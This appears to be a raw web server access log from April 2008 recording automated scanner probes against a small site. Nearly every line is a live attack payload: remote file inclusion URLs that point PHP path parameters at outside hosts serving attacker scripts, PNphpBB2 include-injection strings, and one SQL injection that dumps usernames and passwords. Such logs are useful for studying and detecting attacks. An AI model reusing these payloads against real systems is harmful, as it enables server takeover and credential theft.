203.72.181.15 - - [23/Apr/2008:10:34:23 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:23 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:34:30 -0700] "GET /?CONFIG[pear_dir]=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/auction.gif?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:35 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:36 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:36 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:34:38 -0700] "GET /logs/access_071227.log/myevent.php?myevent_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:34:39 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [23/Apr/2008:10:34:50 -0700] "GET //?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11602 "-" "libwww-perl/5.805" "dmulk.com"
208.53.138.150 - - [23/Apr/2008:10:34:56 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.138.150 - - [23/Apr/2008:10:34:57 -0700] "GET //common/db.php?commonpath=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:34:58 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&mosConfig_absolute_path=http://www.nyekencoi.250x.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
208.53.138.150 - - [23/Apr/2008:10:34:58 -0700] "GET /logs//common/db.php?commonpath=http://autodelen.net//downloads/documenten/documenten1.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:10:35:00 -0700] "GET //components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:10:35:00 -0700] "GET /logs//components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:35:01 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&mosConfig_absolute_path=http://www.nyekencoi.250x.com/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:10:35:04 -0700] "GET /logs/access_080223.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:10:35:05 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:10:35:05 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.92.45 - - [23/Apr/2008:10:35:20 -0700] "GET /logs/access_080313.log/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.ihmmank.net/mode/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:35:21 -0700] "GET /logs/access_071224.log//components/com_simpleboard/image_upload.php?sbp=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:35:33 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:35:34 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:35:34 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.80.102 - - [23/Apr/2008:10:35:40 -0700] "GET /logs/access_080227.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.ramoviferramentas.com.br/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:35:40 -0700] "GET /logs/access_071122.log//components/com_simpleboard/image_upload.php?sbp=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:35:42 -0700] "GET /logs/access_080227.log/components/com_performs/performs.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.27.166 - - [23/Apr/2008:10:35:57 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.67.27.166 - - [23/Apr/2008:10:35:59 -0700] "GET //components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.67.27.166 - - [23/Apr/2008:10:35:59 -0700] "GET /logs//components/com_rsgery/rsgery.html.php?mosConfig_absolute_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:36:04 -0700] "GET //?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:36:04 -0700] "GET //?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:36:06 -0700] "GET //?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.69" "www.dmulk.com"
87.233.3.132 - - [23/Apr/2008:10:36:06 -0700] "GET /logs/access_080218.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:10:36:27 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.156.192.5 - - [23/Apr/2008:10:36:28 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://hantschel.info/uploads/sken/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:36:39 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&p=2195//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:36:40 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:36:41 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:36:41 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=2195//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:36:42 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&p=2195//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.32.94.50 - - [23/Apr/2008:10:36:46 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [23/Apr/2008:10:36:46 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:36:47 -0700] "GET //embed/day.php?path=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:36:48 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:36:49 -0700] "GET /logs//embed/day.php?path=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
89.218.85.18 - - [23/Apr/2008:10:37:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://lunk.110mb.com/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
64.22.89.194 - - [23/Apr/2008:10:37:01 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:10:37:01 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:10:37:02 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:37:21 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:37:23 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:37:23 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:37:23 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:37:27 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.nyekencoi.250x.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:37:27 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.nyekencoi.250x.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:37:29 -0700] "GET /logs/access_080302.log/activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [23/Apr/2008:10:37:38 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:37:38 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
59.125.5.1 - - [23/Apr/2008:10:37:45 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.phanom.ac.th/friendlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:37:53 -0700] "GET /logs/access_080302.log/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:37:55 -0700] "GET /logs/access_080302.log/activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:37:58 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:38:00 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.197.2 - - [23/Apr/2008:10:38:05 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://gukmin.or.kr/bbs/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:38:06 -0700] "GET /logs/access_080223.log/index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:38:06 -0700] "GET /logs/index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:38:08 -0700] "GET /logs/access_080302.log/activecontent.php?vsDragonRootPath=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:10:38:11 -0700] "GET /logs/access_080302.log/activecontent.php?vsDragonRootPath=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:38:29 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:10:38:31 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:10:38:33 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:10:38:33 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.32.94.50 - - [23/Apr/2008:10:38:34 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:10:38:51 -0700] "GET /logs/access_080324.log/index.php?body=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:39:24 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:39:26 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:39:26 -0700] "GET //citywriter/head.php?path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:39:27 -0700] "GET /logs//citywriter/head.php?path=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.186.1.54 - - [23/Apr/2008:10:39:39 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.172.175.130 - - [23/Apr/2008:10:40:04 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
70.86.130.234 - - [23/Apr/2008:10:40:18 -0700] "GET /logs/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.130.234 - - [23/Apr/2008:10:40:21 -0700] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:40:32 -0700] "GET /logs/access.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:40:32 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:10:40:32 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:40:35 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:40:41 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:10:40:53 -0700] "GET /logs/?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.810" "dmulk.com"
217.168.112.1 - - [23/Apr/2008:10:40:58 -0700] "GET /?env%5Binclude_prefix%5D=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11602 "-" "libwww-perl/5.810" "dmulk.com"
203.72.181.15 - - [23/Apr/2008:10:41:04 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.149.242.164 - - [23/Apr/2008:10:41:12 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&p=2195//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.trepamontes4x4.com/digi/on? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:41:28 -0700] "GET /logs/access_080329.log/?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:41:35 -0700] "GET /?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:41:41 -0700] "GET /logs/?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.811" "www.dmulk.com"
67.228.55.26 - - [23/Apr/2008:10:41:52 -0700] "GET /logs/access.log/?pathtoashnews=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:41:58 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:10:42:05 -0700] "GET /logs/access_080226.log//config.inc.php?path_escape=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.243.44.3 - - [23/Apr/2008:10:42:13 -0700] "GET /index.php?option=com_admin=add&Itemid=&mosConfig_absolute_path=http://translators.openfmi.net/MySeLf/cmd.do? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:42:35 -0700] "GET /admin/auth.php?xcart_dir=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "dmulk.com"
209.25.195.66 - - [23/Apr/2008:10:42:35 -0700] "GET /logs/admin/auth.php?xcart_dir=http://www.deyaa.net//images/gif/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:42:40 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.220.36.194 - - [23/Apr/2008:10:42:59 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.westminsterakron.com/templates/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.246.51.45 - - [23/Apr/2008:10:43:00 -0700] "GET //?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 200 11602 "-" "libwww-perl/5.805" "dmulk.com"
87.106.184.203 - - [23/Apr/2008:10:43:10 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://slamweb.org/home/components/com_mosforms/patTemplate/patTemplate/Dump/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
